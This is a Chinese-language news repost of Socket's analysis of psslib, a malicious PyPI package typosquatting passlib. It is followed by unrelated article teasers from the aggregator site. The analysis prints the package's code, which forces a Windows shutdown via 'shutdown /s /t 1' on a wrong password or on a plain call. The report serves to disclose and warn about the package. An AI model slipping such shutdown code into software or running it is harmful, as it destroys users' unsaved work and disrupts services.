Python恶意软件与拼写错误攻击

Socket威胁研究团队发现一个名为psslib的恶意Python包,该软件包伪装成提供密码安全功能,实则会突然关闭Windows系统。这个由化名umaraq的威胁行为者开发的软件包,是对知名密码哈希工具库passlib的拼写错误仿冒(typosquatting)。passlib作为数百万开发者信赖的工具库,每月下载量超过890万次。

恶意代码工作机制

该恶意包通过名为spc()的函数伪装密码保护功能,使用easygui.enterbox()获取用户输入。当输入值与预设密码不匹配时,会立即执行Windows关机命令(shutdown /s /t 1),使系统在一秒内关闭:

def spc(password):# 恶意代码:输入错误时强制系统关机if easygui.enterbox('enter password:-') != password:os.system("shutdown /s /t 1") # 1秒后关机

此外,psslib还包含两个无需任何验证即可关闭系统的函数:

def src():# 无需用户输入直接强制关机os.system("shutdown /s /t 1")def error(message):# 写入错误信息后强制关机sys.stderr.write(message)os.system("shutdown /s /t 1")

攻击影响与针对性

Socket指出,这种恶意软件专门针对基于Windows的开发环境。当开发者在具有提升权限的环境中运行时,即使有限使用该库也会立即危及系统。攻击将导致:

  • 未保存工作和数据丢失
  • 打开的文件和数据库损坏
  • 运行中的服务中断

虽然由于操作系统命令差异,该恶意负载在Linux或macOS上会无害失效,但其针对Windows的特性显示出明确的攻击意图。Socket的AI扫描器已将该包标记为恶意软件,因其具有破坏性系统关机行为。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若转载,请注明出处:http://www.pswp.cn/news/912255.shtml
繁体地址,请注明出处:http://hk.pswp.cn/news/912255.shtml
英文地址,请注明出处:http://en.pswp.cn/news/912255.shtml

如若内容造成侵权/违法违规/事实不符,请联系英文站点网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

云原生灰度方案对比:服务网格灰度(Istio ) 与 K8s Ingress 灰度(Nginx Ingress )

服务网格灰度与 Kubernetes Ingress 灰度是云原生环境下两种主流的灰度发布方案,它们在架构定位、实现方式和适用场景上存在显著差异。以下从多个维度对比分析,并给出选型建议: 一、核心区别对比 维度服务网格灰度(以 Istio 为例…

科技如何影响我们的生活?

科技已成为我们生活中不可或缺的一部分,彻底改变了我们工作、沟通和生活的方式。从智能手机到智能家居,科技已渗透到我们生活的每个角落。无论是用手机闹钟开启新的一天,通过 Alexa 开关灯光,还是打开 Uber 或 Lyft 打车上班&…

Re--攻防世界-基础android

Jadx 可以看到有账号密码输入 进入checkPassword函数 分析一下: 对每个字符 pass[len] 进行以下计算 pass[len] (char) (((255 - len) - 100) - pass[len]); 解密脚本 def decrypt_password(): password [] for len in range(12): c (255 - le…

InnoDB表空间结构-系统表空间

系统表空间整体结构 页号为7的SYS类型页结构

如何构建知识库

构建个人知识库是一个系统化的过程,需要结合工具选择、信息管理和持续优化。以下是分步骤的实用指南,包含现代工具和方法的建议: 一、明确知识库定位(Why) ​核心目标​ 学习型:支持学术研究/职业发展&…

3 大语言模型预训练数据-3.2 数据处理-3.2.2 冗余去除——2.SimHash算法文本去重实战案例:新闻文章去重场景

SimHash算法文本去重实战案例:新闻文章去重场景 一、案例背景与目标二、具体实现步骤与示例1. **待去重文本示例**2. **步骤1:文本预处理与特征提取**3. **步骤2:特征向量化与哈希映射**4. **步骤3:特征向量聚合**5. **步骤4&…

MSPM0G3507之GPIO配置报错 #Sysconfig报错

声明:本文完全免费阅读,如果你发现某天文章被设置了“VIP权限”,请私信我解除(非笔者所为)。 一、问题现象 在打开sysconfig后,GPIO这里会报错。 Unable to render selection Error:launchPadShortcut:Vali…

2025年检测相机十大品牌测评:工业级精度与场景化解决方案解析

一、引言 在工业自动化与智能制造领域,检测相机作为质量管控的核心硬件,正以“高精度、高速度、高适应性”的特性重塑生产流程。这类设备通过光学成像与智能算法结合,实现对工件表面缺陷、尺寸偏差、装配精度的精准检测,效率较传…

Python异步编程深度解析

一、异步编程范式演进 同步阻塞的困境:GIL限制与线程切换开销 事件循环本质:单线程并发模型 协程优势:比线程更轻量的执行单元 IO密集型场景:网络请求/文件操作的最佳实践 二、核心语法精要 import asyncioasync def fetch_…

网络缓冲区

用户态网络缓冲区 网络缓冲区原理为什么需要用户态网络缓冲区Linux下如何接收和发送数据包用户态网络缓冲区设计的本质 网络缓冲区代码实现 网络缓冲区原理 为什么需要用户态网络缓冲区 在网络开发中,我们经常使用到read/write/recv/send等系统调用接口&#xff0…

微信小程序实现简版点赞动画

这是第二次写canvas,基于微信小程序文档demo进行改写 demo效果为方块横向来回循环移动 我想做的是直播间那种点赞效果,竖向曲线移动、方块换成图片、点击添加绘制元素 第一阶段实现竖向曲线移动、点击添加绘制元素;下一阶段讲方块替换为图…

实现一个AI大模型当前都无法正确实现的基础二叉树读取算法

概述 图1: 图2: 上图帮大家温习完全二叉树的概念,本文讲的是完全顺序二叉树的初始化 华为的员工、考过华为OD的员工、参加过其他类似大厂的考试的员工一般做过二叉树的初始化,甚至有些还碰到过手撕代码时面试官要求做二叉树遍历,看完本文的…

【攻防篇】阿里云服务器中 如何关闭docker api端口

在阿里云服务器(ECS)上,Docker API 默认监听 2375(非加密)和 2376(TLS加密)端口。如果未正确配置,可能被恶意利用(如挖矿攻击)。以下是关闭和加固 Docker API…

暑假复习篇之类与对象

面向对象:①类与对象②封装③继承④接口 类与对象: 概念:类就是类别的意思 用class表示 / 面向对象编程,万物皆可编程,在程序中表示一个事物时,往往因为事物的复杂程度导致编程的代码非常复杂 【基本数…

RabbitMQ RPC模式Python示例

文章目录 1.服务端2.客户端3.调用结果 1.服务端 #!/usr/bin/env python3 # -*- coding: UTF-8 -*- """ File: rabbitmq_server.py Date: 2025/6/26 10:42 Author: xxx Description: 1. RabbitMQ服务端,支持多节点命令执行 2. 作为被控…

Rust代码规范之蛇形命名法和驼峰命名法

Rust 使用两种主要的命名风格:驼峰命名法(UpperCamelCase)和蛇形命名法(snake_case)。通常,类型(如结构体、枚举、特征)使用驼峰命名法,而变量、函数、方法等使用蛇形命名…

编写CSS的格式

1、内联样式的css import React, { PureComponent } from reactexport class App extends PureComponent {constructor() {super()this.state {fs: 20}}render() {const { fs } this.statereturn (<div><p style{{ color: red, fontSize: ${fs}px }}>哈哈哈哈哈…

Redis—主从复制

引言 Redis的应用还得是在分布式系统当中。在分布式系统中&#xff0c;涉及到一个非常关键的问题&#xff0c;就是单点问题。例如&#xff0c;如果某个服务器程序&#xff0c;只有一个节点&#xff08;只搞了一个物理服务器&#xff0c;来部署这个服务器程序&#xff09;&…

【网络安全】从IP头部看网络通信:IPv4、IPv6与抓包工具 Wireshark 实战

从IP头部看网络通信&#xff1a;IPv4、IPv6与抓包工具 Wireshark实战 在网络安全分析和数据通信的世界中&#xff0c;一切都始于“数据包”。数据包是网络上传输的基本单位&#xff0c;而数据包的结构与内容&#xff0c;正是我们理解网络行为的核心。本文将带你深入了解 IP 协…

IPv4网络地址分类

目录 一、核心分类标准 二、详细范围与主机数量 1. A类网络&#xff08;超大规模网络&#xff09; 2. B类网络&#xff08;中大型网络&#xff09; 3. C类网络&#xff08;小型网络&#xff09; 三、三类网络对比表 四、保留地址说明 五、现代网络中的变化 六、主机数…